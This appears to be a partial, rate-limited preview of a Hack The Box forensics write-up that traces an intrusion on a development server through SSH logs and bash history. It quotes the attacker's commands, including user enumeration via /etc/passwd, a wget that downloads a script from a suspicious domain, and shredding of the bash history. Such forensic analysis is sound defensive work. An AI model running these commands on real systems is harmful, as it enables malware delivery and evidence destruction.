$ cat writeup.md…
$ cat writeup.md…
hackthebox
This forensics challenge required analyzing SSH logs and bash history to identify a security incident on a development server. The task was to detect signs of unauthorized access, trace the attacker's activities, and extract the flag from the evidence.
$ cat /etc/rate-limit
Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.
This forensics challenge required analyzing SSH logs and bash history to identify a security incident on a development server. The task was to detect signs of unauthorized access, trace the attacker's activities, and extract the flag from the evidence.
The investigation centered on a compromised development server that was accessed from an unusual external IP address during non-business hours, followed by typical post-exploitation activities including system reconnaissance, payload delivery, and evidence destruction.
The primary evidence files were SSH authentication logs (auth.log) and bash command history (.bash_history). Initial examination of the SSH logs revealed a successful login from an unexpected external source:
Feb 19 04:00:14 server sshd[12345]: Accepted publickey for devuser from 2.67.182.119 port 62221 ssh2
Key findings from log analysis:
2.67.182.119 (external, non-corporate address)100.107.36.130:2221 (non-standard port)2024-02-19 04:00:14 (4 AM — outside work hours)OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4Examining the user's bash history revealed a clear sequence of post-exploitation activities:
whoami # Confirm user context uname -a # System reconnaissance cat /etc/passwd # User enumeration wget http://gnu-packages.com/setup.sh # Payload download from suspicious domain shred -u ~/.bash_history # Evidence destruction ./setup # Execute malware
The commands demonstrate a classic attack lifecycle:
/etc/passwdgnu-packages.comshred to destroy bash history evidence./setupSeveral red flags were identified:
...
$ grep --similar